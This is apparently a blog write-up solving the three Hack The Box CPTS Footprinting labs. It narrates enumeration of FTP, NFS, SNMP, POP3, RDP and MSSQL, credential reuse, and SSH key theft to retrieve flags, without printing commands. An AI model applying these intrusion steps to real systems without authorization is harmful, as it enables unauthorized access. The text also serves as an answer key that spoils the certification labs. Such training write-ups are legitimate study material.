CPTS #02: Footprinting
Read these hints and try to solve it yourself before referring to the write-up.
Easy lab: It is a port outside the well-known 1000 ports.
Medium lab: Try logging in as another user.
Hard lab: Using UDP scan.
The Easy Lab
– Performing an Nmap scan on the target revealed the following open ports, including FTP. Since FTP is a protocol prone to misconfigurations, we should check whether any misconfigurations exist in this service.
– We have been provided with the information ‘ceil’, so let’s try using it for the FTP service. We successfully logged in, but there is no useful information here.
– Now, let’s proceed with DNS enumeration. From the banner, we can see that this company’s domain is inlanefreight.htb. We perform DNS enumeration to gather more information. However, after attempting a zone transfer, we did not obtain any useful information.
– However, when I checked back on the ongoing Nmap scan, I discovered another open port: 2121. Based on my assumption, this could be another FTP server. I proceeded to use the previously obtained credentials to log into this FTP server.
– Login was successful, and I listed some interesting directories, including the .ssh directory. I proceeded to download the SSH authorized key and used it to log in without needing a password.
– Now, we just need to locate and read flag.txt somewhere within the directories on this server.
The Medium Lab
– Performed an Nmap scan and found ports for services such as RDP, NFS, SMB.
– Since SMB is available, I attempted SMB enumeration using tools like smbclient, but it didn’t yield any results. At this point, I used showmount on NFS to check for anything interesting and discovered a shared directory.
– After mounting the shared directory, we found many text files inside. One of these files contains information about a specific user.
– We have the login credentials for the user Alex.
– Use this information to log in to the server via RDP.
– After logging in, we noticed that this machine has SQL Server Management Studio installed, suggesting that a database might be running in the background. However, attempting to log in using Alex’s credentials was unsuccessful.
– This message suggests that the user Alex does not have permissions on the database. I proceeded to search around and discovered a directory within Alex’s user folder. Inside, there was a file containing credentials for the sa user, which has the highest privileges in MSSQL.
– However, even with the sa user credentials, we still couldn’t log in to the database.
– I was stuck here for a long time trying to figure out the login credentials, thinking it was an issue caused by the service (I was so foolish). After a few hours, I decided to look for hints in the forum, where members suggested trying to log in with a different user who might have higher privileges. That’s when I thought of this approach and attempted to log in as Administrator using the sa user’s password.
– Login was successful! Now, open SQL Server Management Studio and use Windows Authentication with the Administrator session. We have successfully accessed the database. Now, we just need to run queries to retrieve the password for the HTB user.
The Hard Lab
– Performed an Nmap scan and found open ports for IMAP, POP3, and SSH.
– In this lab, we don’t have any credentials to log in to the IMAP or POP3 server, so let’s try to find them. I spent around two hours trying to find other open ports for enumeration, but Nmap still hadn’t finished. I was stuck without any hints from HTB.
– After that, I performed a UDP scan, which took a long time. So, I decided to look for hints in the HTB forum, where I found a suggestion about the SNMP protocol. I then specifically scanned this port and discovered that it was open.
– I used snmpwalk to enumerate SNMP with some common community strings like public and private, but nothing worked. So, I performed community string enumeration using onesixtyone. After that, I found the correct community string. I then went back and used snmpwalk with that string.
– After snmpwalk finishes, we find some information related to credentials.
– The first protocol I tried to exploit was POP3 on port 110. I logged in successfully and found an email containing a key. I suspected it might be an SSH key, so I copied it to my machine and used it to log in via SSH.
– Logged in successfully! Now, let’s look around for anything that might reveal the password of the HTB user.
– I tried reading some emails and checking the Maildir directory, but found nothing interesting.
– So, I listed hidden files and decided to check the Bash history. From there, I discovered that this machine runs MySQL and that the current user can log in to the MySQL server. Next, I checked the MySQL history and found a users database. Let’s log in to MySQL and query the table to retrieve the password for the HTB user.
– From here, use SQL query to retrieve the password.
